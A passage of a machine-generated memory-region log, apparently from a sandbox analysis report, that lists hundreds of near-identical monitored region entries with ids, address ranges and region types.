0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11825 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11826 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11827 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11828 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11829 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11830 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11831 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11832 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11833 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11834 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11835 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11836 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11837 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11838 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11839 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11840 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11841 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11842 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11843 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11844 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11845 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11846 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11847 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11848 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11849 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11850 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11851 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11852 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11853 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11854 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11855 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11856 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11857 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11858 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11859 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11860 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11861 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11862 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11863 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11864 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11865 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11866 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11867 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11868 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11869 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11870 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11871 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11872 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11873 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11874 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11875 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11876 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11877 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11878 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11879 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11880 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11881 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11882 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11883 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11887 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11888 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11889 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11890 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11891 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11892 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11893 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11894 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11895 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11896 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11897 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11898 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11899 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11900 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11901 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11902 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11903 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11904 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11905 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11906 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11907 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11908 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11909 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11910 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11911 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11912 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11913 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11914 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11915 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11916 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11917 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11918 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11919 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11920 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11921 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11922 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11923 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11924 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11925 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11929 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11930 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11931 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11932 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11933 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 11934 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 11935 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 11936 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11937 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11938 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11939 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11940 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11941 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11942 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11943 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11944 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11945 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11946 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11947 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11948 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11949 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11950 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11951 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11952 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11953 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11954 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11955 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11956 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11957 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11958 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11959 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11960 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11961 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11962 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11963 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11964 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11965 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11966 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11967 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11968 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11969 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11970 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11971 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11972 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11973 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11974 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11975 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11976 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11977 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11978 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11979 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11980 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11981 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11982 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11983 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11984 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11985 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11986 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11987 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11988 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11989 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11990 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11991 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11992 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11993 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11994 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11995 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11996 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11997 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11998 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11999 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12000 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12001 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12002 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12003 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12004 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12005 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12006 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12007 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12008 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12009 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12012 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12013 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12014 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12015 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12016 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12017 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12018 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12019 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12020 start_va = 0x580000 